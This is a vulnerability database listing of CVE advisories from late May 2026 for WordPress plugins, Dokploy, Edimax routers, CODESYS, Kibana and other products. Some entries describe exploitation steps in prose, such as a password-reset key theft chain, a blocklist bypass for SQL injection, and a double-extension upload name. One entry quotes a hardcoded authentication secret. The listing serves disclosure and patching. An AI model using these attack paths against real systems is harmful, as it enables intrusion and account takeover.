| code100x--code100x | code100x contains an authentication bypass vulnerability in the Mobile API that allows unauthenticated attackers to impersonate arbitrary users by supplying a crafted JSON payload in the 'g' HTTP header. The middleware in middleware.ts skips identity header generation when an Auth-Key header is present without validating its value, allowing attackers to inject a spoofed user identity header that the downstream route handler in the mobile courses endpoint accepts as trusted, granting unauthorized access to course data belonging to any enrolled user or administrator. | 2026-05-26 | 8.2 | CVE-2026-8890 |
| CodeRevolution--Crawlomatic Multipage Scraper Post Generator | The Crawlomatic Multipage Scraper Post Generator plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.7.2 via the filter_content function. This is due to passing the attacker-supplied 'callback_raw' shortcode attribute directly into call_user_func() with no sanitization or allowlist validation, relying solely on an is_callable() check that permits dangerous PHP built-ins such as system, shell_exec, exec, passthru, and assert. This makes it possible for authenticated attackers, with author-level access and above, to execute code on the server. An identical sink exists for the 'callback' attribute, providing a second independent vector through the same shortcode. | 2026-05-28 | 8.8 | CVE-2026-9009 |
| CODESYS--CODESYS Control RTE (SL) | The affected products insufficiently verify authorization when deleting user accounts. An authenticated, low-privileged remote user can exploit this vulnerability to delete other users, including those with higher privileges. | 2026-05-26 | 8.1 | CVE-2026-8046 |
| CODESYS--CODESYS Control RTE (SL) | The affected products perform improper length checking when parsing incoming HTTP requests, resulting in a size-limited out-of-bounds write. An unauthenticated remote attacker can exploit this flaw to cause a denial of service via a system crash on the affected device. | 2026-05-26 | 7.5 | CVE-2026-8047 |
| CODESYS--CODESYS Development System | The affected product creates a directory with insecure default permissions during administrative installation. This allows a low-privileged local attacker to modify a temporary file defining the components to be installed, enabling local privilege escalation by forcing the deployment of arbitrary components. | 2026-05-26 | 7.8 | CVE-2026-44468 |
| CODESYS--CODESYS Development System | The affected product extracts installation files to a temporary directory with incorrect default permissions during administrative installation. A low-privileged local attacker can exploit a TOCTOU race condition with a practical time window to replace verified files with malicious ones before installation, resulting in local privilege escalation. | 2026-05-26 | 7.8 | CVE-2026-44469 |
| Commentcamarche--Free MP3 CD Ripper | Free MP3 CD Ripper 2.8 contains a stack-based buffer overflow vulnerability in WMA file processing that allows local attackers to bypass DEP protection via structured exception handling manipulation. Attackers can craft a malicious WMA file that triggers the overflow when loaded through the Convert function, enabling execution of arbitrary code through ROP chain gadgets and shellcode injection. | 2026-05-29 | 8.4 | CVE-2018-25383 |
| CP Plus--CP-UNR-108F1 Hardware | A stored cross-site scripting (XSS) vulnerability exists in certain 1xxx series NVR devices due to insufficient sanitization of user-supplied input in specific functional modules. Attackers can inject malicious scripts, which are then persistently stored on the device backend. When administrators or users access affected pages, the stored scripts are executed in their browsers, leading to potential session hijacking, unauthorized actions, or data theft. | 2026-05-29 | 8.4 | CVE-2026-6824 |
| Crocoblock--JetEngine | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Crocoblock JetEngine allows SQL Injection. This issue affects JetEngine: from n/a through 3.8.8.1. | 2026-05-25 | 9.3 | CVE-2026-42774 |
| croixhaug--Appointment Booking Calendar Simply Schedule Appointments Booking Plugin | The Appointment Booking Calendar - Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'append_where_sql' parameter in all versions up to, and including, 1.6.11.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. The /appointments/bulk REST endpoint is reachable by unauthenticated attackers because its permission check accepts a public nonce that is embedded in the booking widget's frontend JavaScript (ssa.api.public_nonce) and visible to all site visitors; exploitation requires issuing the request as a PUT with an application/x-www-form-urlencoded body so that PHP's superglobals are not populated and the blocklist check silently passes. | 2026-05-28 | 7.5 | CVE-2026-7797 |
| cservit--affiliate-toolkit Multi-Network Affiliate & Amazon Product Display | The affiliate-toolkit plugin for WordPress is vulnerable to remote code execution in all versions up to, and including, 3.8.5. This is due to the plugin using the BladeOne templating engine's runString() method which compiles user-supplied template content into PHP code and executes it via eval() without sanitization or sandboxing. This makes it possible for authenticated attackers, with Editor-level access and above, to execute arbitrary code on the server by injecting PHP into a plugin template. | 2026-05-27 | 7.2 | CVE-2026-6169 |
| cssigniterteam--GutenBee Gutenberg Blocks | The GutenBee - Gutenberg Blocks plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 2.20.1 via the gutenbee_file_and_ext_json function. This is due to a flawed strpos() substring check that only verifies whether the filename contains the string '.json' rather than confirming the filename ends with a .json extension, allowing double-extension filenames like shell.json.php to bypass validation. This makes it possible for authenticated attackers, with author-level access and above, to upload files that may be executable, which makes remote code execution possible. | 2026-05-28 | 8.8 | CVE-2026-9227 |
| czlonkowski--n8n-mcp | n8n-MCP is an MCP server that provides AI assistants access to n8n node documentation, properties, and operations. Prior to 2.51.2, when ENABLE_MULTI_TENANT=true, the HTTP transport documents that the target n8n instance is selected per-request from x-n8n-url / x-n8n-key headers. Requests that omitted those headers - or supplied only one of them - silently fell back to the process-level N8N_API_URL / N8N_API_KEY credentials configured for the operator's own n8n instance. As a result, an authenticated MCP tenant could cause n8n management calls to execute against the operator's instance instead of its own. This affects HTTP-mode deployments of n8n-mcp that are run as a shared multi-tenant service. Single-tenant deployments (ENABLE_MULTI_TENANT unset or false) are not affected. This vulnerability is fixed in 2.51.2. | 2026-05-29 | 8.1 | CVE-2026-45707 |
| Danelec--MacGregor Voyage Data Recorder (VDR) G4e | Danelec MacGregor Voyage Data Recorder includes default accounts with hard-coded credentials. | 2026-05-29 | 8.3 | CVE-2026-42929 |
| Danelec--MacGregor Voyage Data Recorder (VDR) G4e | The Danelec MacGregor Voyage Data Recorder device includes a default username and password, with no enforced password change. | 2026-05-29 | 8.3 | CVE-2026-42941 |
| Das--Parking Management System | A vulnerability was identified in Das Parking Management System 停车场管理系统 6.2.0. This affects the function xp_cmdshell of the file ParkingRecord/ExportParkingRecords of the component API Endpoint. The manipulation of the argument Value leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-26 | 7.3 | CVE-2026-9551 |
| Das--Parking Management System | A security flaw has been discovered in Das Parking Management System 停车场管理系统 6.2.0. This vulnerability affects unknown code of the component Search API Endpoint. The manipulation of the argument Value results in sql injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-26 | 7.3 | CVE-2026-9552 |
| DataDog--guarddog | GuardDog is a CLI tool to identify malicious PyPI packages. From 1.0.0 to 2.9.0, the programmatic remote project scanning path rewrites attacker-controlled repository URLs using a blind string replacement and then sends the caller's GitHub credentials with the resulting request. This allows an attacker who can influence the scanned repository URL to trigger SSRF and capture the GH_TOKEN used by GuardDog. This vulnerability is fixed in . | 2026-05-27 | 8.2 | CVE-2026-44971 |
| Delta Electronics--DIAView | There is a mitigation bypass (incomplete fix) for CVE-2025-62582 (Unauthenticated Remote Database Access). An unauthenticated remote attacker can access configured databases in a DIAView project. | 2026-05-26 | 9.8 | CVE-2026-9642 |
| Deltasql--Delta Sql | Delta Sql 1.8.2 contains an arbitrary file upload vulnerability that allows unauthenticated attackers to upload malicious files by sending POST requests to docs_upload.php with crafted multipart form data. Attackers can upload PHP files with arbitrary content to the upload directory and execute them on the server for remote code execution. | 2026-05-30 | 9.8 | CVE-2018-25412 |
| devsabbirahmed--Firebase Support & Chat Management | The Firebase Support & Chat Management plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 3.1.1. This is due to the `firebase_auth()` function authenticating the request as the WordPress user whose email is supplied in the `user_email` POST parameter without verifying ownership of that email (no Firebase ID token signature/issuer/audience verification). This makes it possible for authenticated attackers, with Subscriber-level access and above, to log in as an arbitrary existing user - including an Administrator - by submitting that user's email address to the `acb_firebase_auth` AJAX action, resulting in full account takeover. | 2026-05-27 | 8.8 | CVE-2026-8787 |
| dglingren--Media Library Assistant | The Media Library Assistant plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.35. This is due to missing nonce verification on the bulk action handlers in the settings tab handlers. This makes it possible for unauthenticated attackers to trick an administrator into performing bulk delete, edit, or purge operations on plugin settings and attachment metadata via a forged request. | 2026-05-29 | 8.1 | CVE-2026-6075 |
| Dokploy--dokploy | Dokploy is a free, self-hostable Platform as a Service (PaaS). From 0.27.0 to before 0.29.3, a hardcoded BETTER_AUTH_SECRET fallback ("better-auth-secret-123456789") lets an unauthenticated attacker forge email verification JWTs, trigger auto-sign-in as admin, and execute commands on the host via the built-in SSH terminal. This vulnerability is fixed in 0.29.3. | 2026-05-29 | 10 | CVE-2026-45631 |
| Dokploy--dokploy | Dokploy is a free, self-hostable Platform as a Service (PaaS). In 0.29.2 and earlier, Dokploy constructs shell commands using JavaScript template literals and executes them via child_process.exec() (which runs through /bin/sh -c). User-supplied branch names, repository URLs, and Docker credentials are interpolated directly into these commands without escaping. This requires an authenticated user with application create/edit privileges. | 2026-05-29 | 9.6 | CVE-2026-45628 |
| Dokploy--dokploy | Dokploy is a free, self-hostable Platform as a Service (PaaS). In 0.28.8 and earlier, authenticated OS command injection in the /listen-deployment WebSocket endpoint allows any organization member to execute arbitrary system commands on remote servers managed by Dokploy, leading to full server compromise. | 2026-05-29 | 9.9 | CVE-2026-45629 |
| Dokploy--dokploy | Dokploy is a free, self-hostable Platform as a Service (PaaS). In 0.28.8 and earlier, authenticated OS command injection in the application.updateTraefikConfig tRPC endpoint allows admin/owner users to execute arbitrary system commands on remote servers via unsanitized echo shell interpolation. | 2026-05-29 | 9 | CVE-2026-45630 |
| Dokploy--dokploy | Dokploy is a free, self-hostable Platform as a Service (PaaS). In 0.26.7 and earlier, the schedule router does not enforce organization/role checks. As a result, any authenticated user can create, update, run, or delete schedules belonging to other organizations if they know the scheduleId/serverId. Schedule types server and dokploy-server write and execute scripts on the host or remote servers, enabling RCE on the Dokploy host or a target server. | 2026-05-29 | 9.9 | CVE-2026-45632 |
| Dokploy--dokploy | Dokploy is a free, self-hostable Platform as a Service (PaaS). In 0.26.6 and earlier, Dokploy contains a command injection vulnerability in the /docker-container-logs WebSocket endpoint. The tail and since parameters are not validated and are directly concatenated into shell commands, allowing authenticated users to execute arbitrary commands with root privileges. | 2026-05-29 | 9.9 | CVE-2026-45633 |
| Dokploy--dokploy | Dokploy is a free, self-hostable Platform as a Service (PaaS). In 0.26.5 and earlier, a critical path traversal vulnerability exists in Dokploy v0.26.5 that allows authenticated users to write arbitrary files to the filesystem during application deployment. When combined with Dokploy's remote server deployment feature, this vulnerability enables arbitrary file write to remote server filesystems, automatic remote code execution via cron jobs, complete server compromise, data exfiltration without user interaction, and persistent backdoor installation. This vulnerability bypasses all container isolation on remote server deployments. | 2026-05-29 | 9.9 | CVE-2026-45661 |
| Dokploy--dokploy | Dokploy is a free, self-hostable Platform as a Service (PaaS). In 0.29.1 and earlier, a command injection vulnerability exists in the Docker file upload functionality. When an authenticated user uploads a file to a container, the destinationPath parameter is not properly sanitized and is directly interpolated into a shell command string. By including shell metacharacters such as ; or ", an attacker can escape the intended docker cp command and execute arbitrary OS commands on the Dokploy host. | 2026-05-29 | 9.9 | CVE-2026-45663 |
| Dokploy--dokploy | Dokploy is a free, self-hostable Platform as a Service (PaaS). In 0.29.0 and earlier, the deleteRegistry function in Dokploy (packages/server/src/services/registry.ts) executes docker logout ${response.registryUrl} without shell escaping. In the same file, the docker login command correctly uses shEscape() to prevent command injection. This inconsistency creates a command injection vulnerability when deleting a registry with a crafted registryUrl. | 2026-05-29 | 8.8 | CVE-2026-45662 |
| Dylan Kuhn--Geo Mashup | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dylan Kuhn Geo Mashup geo-mashup allows Reflected XSS. This issue affects Geo Mashup: from n/a through <= 1.13.19. | 2026-05-27 | 7.1 | CVE-2026-42734 |
| e107inc--e107 | e107 is a content management system (CMS). Prior to 2.3.4, a Host Header Injection vulnerability in the password reset page allows attackers to manipulate the Host header to generate password reset links pointing to attacker-controlled domains. This can lead to phishing attacks, account takeover, or other security risks. The severity is high, as the vulnerability affects a critical function related to user authentication. This vulnerability is fixed in 2.3.4. | 2026-05-26 | 8.1 | CVE-2026-43935 |
| e4jvikwp--VikBooking Hotel Booking Engine & PMS | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in e4jvikwp VikBooking Hotel Booking Engine & PMS vikbooking allows Path Traversal. This issue affects VikBooking Hotel Booking Engine & PMS: from n/a through <= 1.8.9. | 2026-05-27 | 8.6 | CVE-2026-42737 |
| e4jvikwp--VikBooking Hotel Booking Engine & PMS | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in e4jvikwp VikBooking Hotel Booking Engine & PMS vikbooking allows DOM-Based XSS. This issue affects VikBooking Hotel Booking Engine & PMS: from n/a through <= 1.8.9. | 2026-05-27 | 7.1 | CVE-2026-42762 |
| Edimax--BR-6478AC | A vulnerability was identified in Edimax BR-6478AC 1.23. Affected by this vulnerability is the function formPPPoESetup of the file /goform/formPPPoESetup of the component POST Request Handler. The manipulation of the argument pppUserName leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit is publicly available and might be used. | 2026-05-30 | 8.8 | CVE-2026-10125 |
| Edimax--BR-6478AC | A security flaw has been discovered in Edimax BR-6478AC 1.23. Affected by this issue is the function formQoS of the file /goform/formQoS of the component POST Request Handler. The manipulation of the argument selSSID results in buffer overflow. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-30 | 8.8 | CVE-2026-10126 |
| Edimax--BR-6478AC | A vulnerability has been found in Edimax BR-6478AC 1.23. This issue affects the function formUSBAccount of the file /goform/formUSBAccount of the component POST Request Handler. The manipulation of the argument UserName/Password leads to buffer overflow. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. | 2026-05-31 | 8.8 | CVE-2026-10163 |
| Edimax--BR-6478AC | A vulnerability was found in Edimax BR-6478AC 1.23. Impacted is the function formUSBFolder of the file /goform/formUSBFolder of the component POST Request Handler. The manipulation of the argument ShareName/SelectName results in buffer overflow. The attack can be executed remotely. The exploit has been made public and could be used. | 2026-05-31 | 8.8 | CVE-2026-10164 |
| Edimax--BR-6478AC | A vulnerability was identified in Edimax BR-6478AC 1.23. The impacted element is the function formWanTcpipSetup of the file /goform/formWanTcpipSetup of the component POST Request Handler. Such manipulation of the argument pppUserName leads to stack-based buffer overflow. The attack may be performed from remote. The exploit is publicly available and might be used. | 2026-05-31 | 8.8 | CVE-2026-10165 |
| Edimax--BR-6478AC | A weakness has been identified in Edimax BR-6478AC 1.23. This affects the function formiNICSiteSurvey of the file /goform/formiNICSiteSurvey of the component POST Request Handler. Executing a manipulation of the argument selSSID can lead to buffer overflow. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9442 |
| Edimax--BR-6478AC | A security vulnerability has been detected in Edimax BR-6478AC 1.23. This vulnerability affects the function formL2TPSetup of the file /goform/formL2TPSetup of the component POST Request Handler. The manipulation of the argument L2TPUserName leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9443 |
| Edimax--EW-7438RPn | A security vulnerability has been detected in Edimax EW-7438RPn 1.31. The impacted element is the function formWlanMP of the file /goform/formWlanMP. The manipulation of the argument ateFunc/ateGain/ateTxCount/ateChan/ateRate/ateMacID/e2pTxPower1/e2pTxPower2/e2pTxPower3/e2pTxPower4/e2pTxPower5/e2pTxPower6/e2pTxPower7/e2pTx2Power1/e2pTx2Power2/e2pTx2Power3/e2pTx2Power4/e2pTx2Power5/e2pTx2Power6/e2pTx2Power7/ateTxFreqOffset/ateMode/ateBW/ateAntenna/e2pTxFreqOffset/e2pTxPwDeltaB/e2pTxPwDeltaG/e2pTxPwDeltaMix/e2pTxPwDeltaN/readE2P leads to stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9425 |
| Edimax--EW-7438RPn | A vulnerability was detected in Edimax EW-7438RPn 1.31. This affects the function formHwSet of the file /goform/formHwSet. The manipulation of the argument Anntena/Mcs/regDomain/nic0Addr/nic1Addr/wlanAddr/wanAddr/wlanSSID/wlanChan/initgain/txcck/txofdm/submit-url results in stack-based buffer overflow. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9426 |
| Edimax--EW-7438RPn | A flaw has been found in Edimax EW-7438RPn 1.31. This impacts the function formWlSiteSurvey of the file /goform/formWlSiteSurvey of the component webs. This manipulation of the argument selSSID/submit-url causes stack-based buffer overflow. The attack can be carried out remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9427 |
| Edimax--EW-7438RPn | A security flaw has been discovered in Edimax EW-7438RPn 1.31. This affects the function formConnectionSetting of the file /goform/formConnectionSetting. Performing a manipulation of the argument max_Conn/timeOut results in stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9459 |
| Edimax--EW-7438RPn | A weakness has been identified in Edimax EW-7438RPn 1.31. This impacts the function formAccept of the file /goform/formAccept. Executing a manipulation of the argument submit-url can lead to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9460 |
| Edimax--EW-7438RPn | A security vulnerability has been detected in Edimax EW-7438RPn 1.31. Affected is the function formRadius of the file /goform/formRadius. The manipulation of the argument submit-url leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9461 |
| Edimax--EW-7438RPn | A vulnerability was detected in Edimax EW-7438RPn 1.31. Affected by this vulnerability is the function formWpsProxyEnable of the file /goform/formWpsProxyEnable. The manipulation of the argument submit-url results in stack-based buffer overflow. The attack can be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9462 |
| Edimax--EW-7438RPn | A flaw has been found in Edimax EW-7438RPn 1.31. Affected by this issue is the function formLicence of the file /goform/formLicence. This manipulation of the argument submit-url causes stack-based buffer overflow. The attack may be initiated remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9463 |
| Edimax--EW-7438RPn | A security vulnerability has been detected in Edimax EW-7438RPn 1.31. The affected element is the function formLogout of the file /goform/formLogout. The manipulation of the argument submit-url leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9479 |
| Edimax--EW-7438RPn | A vulnerability was detected in Edimax EW-7438RPn 1.31. The impacted element is the function formrefresh of the file /goform/formrefresh. The manipulation of the argument submit-url results in stack-based buffer overflow. It is possible to launch the attack remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9480 |
| Edimax--EW-7438RPn | A flaw has been found in Edimax EW-7438RPn 1.31. This affects the function formStats of the file /goform/formStats. This manipulation of the argument submit-url causes stack-based buffer overflow. The attack can be initiated remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9481 |
| Edimax--EW-7438RPn | A vulnerability has been found in Edimax EW-7438RPn 1.31. This impacts the function formSDHCP of the file /goform/formSDHCP. Such manipulation of the argument submit-url leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 8.8 | CVE-2026-9482 |
| edward_plainview--MyCryptoCheckout | Missing Authorization vulnerability in edward_plainview MyCryptoCheckout allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects MyCryptoCheckout: from n/a through 2.161. | 2026-05-25 | 7.5 | CVE-2026-45209 |
| Elastic--Kibana | Server-Side Request Forgery (CWE-918) in Kibana allows authenticated users with connector management privileges to bypass the operator-configured connection allowlist. By configuring a Webhook connector with a crafted target, an attacker can cause Kibana to issue outbound requests to destinations that the egress restriction controls were intended to block. | 2026-05-28 | 7.7 | CVE-2026-42398 |
| Elastic--Kibana | Improper Input Validation (CWE-20) in the Kibana Fleet agent policy management feature can lead to privilege escalation. An authenticated user with Fleet management privileges can manipulate agent policy configuration by injecting values into a configuration override mechanism that is not adequately validated. An attacker can cause Elastic Agents to be issued API keys with elevated Elasticsearch privileges, potentially granting unauthorized read and write access to sensitive Elasticsearch security indices beyond what is intended for the Fleet management role. | 2026-05-28 | 7.2 | CVE-2026-49095 |
| ellanetworks--core | Ella Core is a 5G core designed for private networks. Prior to 1.10.0, a radio with a valid NG Setup can send a forged PDUSessionResourceSetupResponse carrying any UE's AMF-UE-NGAP-ID. Ella Core does not verify the message arrived on the SCTP association bound to that UE's logical NG-connection, then creates a GTP tunnel towards that radio. This vulnerability is fixed in 1.10.0. | 2026-05-27 | 7.1 | CVE-2026-44473 |
| eMagicOne--eMagicOne Store Manager | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in eMagicOne eMagicOne Store Manager allows Blind SQL Injection. This issue affects eMagicOne Store Manager: from n/a through 1.3.2. | 2026-05-25 | 9.3 | CVE-2026-42773 |
| Endonesia--eNdonesia Portal | eNdonesia Portal 8.7 contains multiple SQL injection vulnerabilities that allow unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through parameters in mod.php. Attackers can inject SQL through the artid, cid, did, contid, and aboutid parameters to extract sensitive database information including usernames, database names, and version details. | 2026-05-30 | 8.2 | CVE-2018-25405 |
| Endonesia--eNdonesia Portal | eNdonesia Portal 8.7 contains multiple SQL injection vulnerabilities that allow unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through parameters in mod.php. Attackers can inject SQL through the artid, cid, did, contid, and aboutid parameters across publisher, diskusi, galeri, content, and about modules to extract database credentials, usernames, and version information. | 2026-05-30 | 8.2 | CVE-2018-25406 |
| Endonesia--eNdonesia Portal | eNdonesia Portal 8.7 contains multiple SQL injection vulnerabilities that allow unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through parameters in mod.php. Attackers can inject SQL through the artid, cid, did, contid, and aboutid parameters across publisher, diskusi, galeri, content, and about modules to extract database information including usernames, database names, and version details. | 2026-05-30 | 8.2 | CVE-2018-25407 |
| Eppendorf--BioFlo 320 | Eppendorf BioFlo 320 is vulnerable due to its VNC server using a hard-coded password. If a remote attacker knows the network address of any BioFlo 320 model with remote access enabled, they can gain full control of the user interface by using this password. Once connected, the attacker would have full access to all control panel features for the BioFlo 320. VNC traffic is not encrypted. | 2026-05-26 | 9.8 | CVE-2026-7251 |
| eregistrasi-kejuaraan-silat--Registrasi Pencak Silat | E-Registrasi Pencak Silat 18.10 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the id_partai parameter. Attackers can send GET requests to monitor_nilai.php with crafted SQL payloads in the id_partai parameter to extract sensitive database information including admin credentials and user data. | 2026-05-29 | 8.2 | CVE-2018-25385 |
| error311--FileRise | FileRise is a self-hosted web-based file manager with multi-file upload, editing, and batch operations. Prior to 3.12.0, /api/totp_setup.php is callable from a session that has only passed the password check (state pending_login_user). When the target account already has TOTP configured, the endpoint decrypts and returns the user's existing TOTP secret inside the QR PNG instead of refusing or generating a new secret. An attacker who already possesses the victim's password can therefore retrieve the live TOTP secret, derive a valid one-time code, submit it to /api/totp_verify.php, and obtain a fully authenticated session without ever possessing the victim's authenticator device. This vulnerability is fixed in 3.12.0. | 2026-05-27 | 7.4 | CVE-2026-44460 |
| eskapism--Simple History Track, Log, and Audit WordPress Changes | The Simple History - Track, Log, and Audit WordPress Changes plugin for WordPress is vulnerable to authenticated (Subscriber+) account takeover in all versions up to, and including, 5.26.0 via the event reaction endpoints (react_to_event() / unreact_to_event()). The endpoints register get_items_permissions_check() as their permission_callback, which only verifies the requester is logged in and does not enforce the per-logger capability checks normally applied by Log_Query. As a result, a Subscriber-level user can POST to /wp-json/simple-history/v1/events/<id>/react with the _fields=context query parameter and read the full context of any Simple History event - including SimpleUserLogger entries that record the full password-reset email body (reset URL with the reset key) for any user. The attacker triggers a password reset for an administrator via the lost-password form, brute-forces recent event IDs through the reaction endpoint to read the resulting user_requested_password_reset_link event, extracts the reset key from context.message, and completes the password reset to take over the administrator account. Exploitation requires an administrator to have first enabled the experimental features option (simple_history_experimental_features_enabled), which is not the default. | 2026-05-30 | 7.5 | CVE-2026-7459 |
| esm-dev--esm.sh | esm.sh is a no-build content delivery network (CDN) for web development. In 137 and earlier, a Local File Inclusion (LFI) vulnerability exists in the esbuild plugin's handling of the browser field in package.json. An attacker can publish an npm package that causes the server to read and return arbitrary files from the host filesystem during the build process. | 2026-05-28 | 7.5 | CVE-2026-44594 |
| espressif--shared-github-dangerjs | Espressif Shared GitHub DangerJS is a reusable GitHub Action CI DangerJS workflow for Espressif GitHub projects. Prior to 1.0.1, the action's entrypoint.sh invoked DangerJS from the caller's workspace after copying the fork's checkout into it, creating an untrusted search path for both binary resolution and Node.js module resolution. A fork pull request processed by a pull_request_target workflow could therefore cause fork-supplied code to execute inside the action container in place of the action's own code. This vulnerability is fixed in 1.0.1. | 2026-05-28 | 8.2 | CVE-2026-44358 |
| Extro--eXtroForms | Joomla Component eXtroForms 2.1.5 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL commands through the filter_type_id, filter_pid_id, and filter_search parameters. Attackers can submit POST requests to the extroformfield view with malicious SQL payloads to extract sensitive database information and server data. | 2026-05-25 | 7.1 | CVE-2018-25380 |
| Extro--Responsive Portfolio | Joomla Responsive Portfolio 1.6.1 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL commands through multiple filter parameters. Attackers can inject malicious SQL code via the filter_type_id, filter_pid_id, and filter_search parameters in POST requests to extract sensitive database information including credentials and server details. | 2026-05-25 | 7.1 | CVE-2018-25381 |
| factionsecurity--faction | FACTION is a PenTesting Report Generation and Collaboration Framework. Prior to 1.8.3, AccessControlInterceptor, the authentication gate for all Struts2 actions, unconditionally calls invocation.invoke() without checking for a valid session. Four action methods in BoilerPlateConfig perform no local session check either, allowing an unauthenticated attacker to read, overwrite, deactivate, and permanently delete any boilerplate template in the system. This vulnerability is fixed in 1.8.3. | 2026-05-26 | 9.8 | CVE-2026-44668 |
| factionsecurity--faction | FACTION is a PenTesting Report Generation and Collaboration Framework. Prior to 1.8.3, Faction is vulnerable to stored cross-site scripting (XSS) via attachment filenames in remediation verification file preview flows. User-supplied filename values are persisted and then rendered into HTML and attribute contexts without output encoding, allowing attacker-controlled JavaScript to execute in the browser of any user who opens the affected verification/remediation views. Because the payload is stored server-side and rendered to other users, exploitation is persistent and can impact privileged accounts. This vulnerability is fixed in 1.8.3. | 2026-05-26 | 8.7 | CVE-2026-44667 |
| factionsecurity--faction | FACTION is a PenTesting Report Generation and Collaboration Framework. Prior to 1.8.3, Faction is vulnerable to stored cross-site scripting (XSS) via attachment filenames in assessment file preview flows. User-supplied filename values are persisted and later rendered into HTML/attribute contexts without output encoding, allowing attacker-controlled JavaScript to execute in the browser of any user who views the affected page. Because the payload is stored server-side and rendered to other users, exploitation is persistent and can impact privileged accounts. This vulnerability is fixed in 1.8.3. | 2026-05-26 | 8.7 | CVE-2026-44669 |
| flippercode--WP Maps Pro | The WP Maps Pro plugin for WordPress is vulnerable to Privilege Escalation via Administrator Account Creation in all versions up to, and including, 6.1.0. This is due to the wpgmp_temp_access_ajax AJAX action being registered with wp_ajax_nopriv_ and protected only by a nonce check using the fc-call-nonce nonce, which is publicly embedded into every frontend page via wp_localize_script as the nonce field of the wpgmp_local JavaScript object, rendering the check ineffective as an access control mechanism. This makes it possible for unauthenticated attackers to invoke the wpgmp_temp_access_support handler with check_temp=false, which unconditionally creates a new WordPress user with the hardcoded role of administrator via wp_insert_user() and returns a magic login URL that, when visited, calls wp_set_auth_cookie() to fully authenticate the attacker as the newly created administrator, resulting in complete site takeover. | 2026-05-29 | 9.8 | CVE-2026-8732 |
| FoundDream--miniclawd | A security vulnerability has been detected in FoundDream miniclawd up to 2d65665046e2222eeea76cafc8570ed546a8c125. Affected by this issue is the function ExecTool.execute of the file /src/tools/exec.ts. Such manipulation leads to os command injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. This product does not use versioning. This is why information about affected and unaffected releases is unavailable. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-25 | 7.3 | CVE-2026-9452 |
| FoundDream--miniclawd | A vulnerability was detected in FoundDream miniclawd up to 2d65665046e2222eeea76cafc8570ed546a8c125. This affects the function which of the file /src/application/skills-loader.ts of the component SkillsLoader. Performing a manipulation of the argument requires.bins results in command injection. The attack may be initiated remotely. The exploit is now public and may be used. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-25 | 7.3 | CVE-2026-9453 |
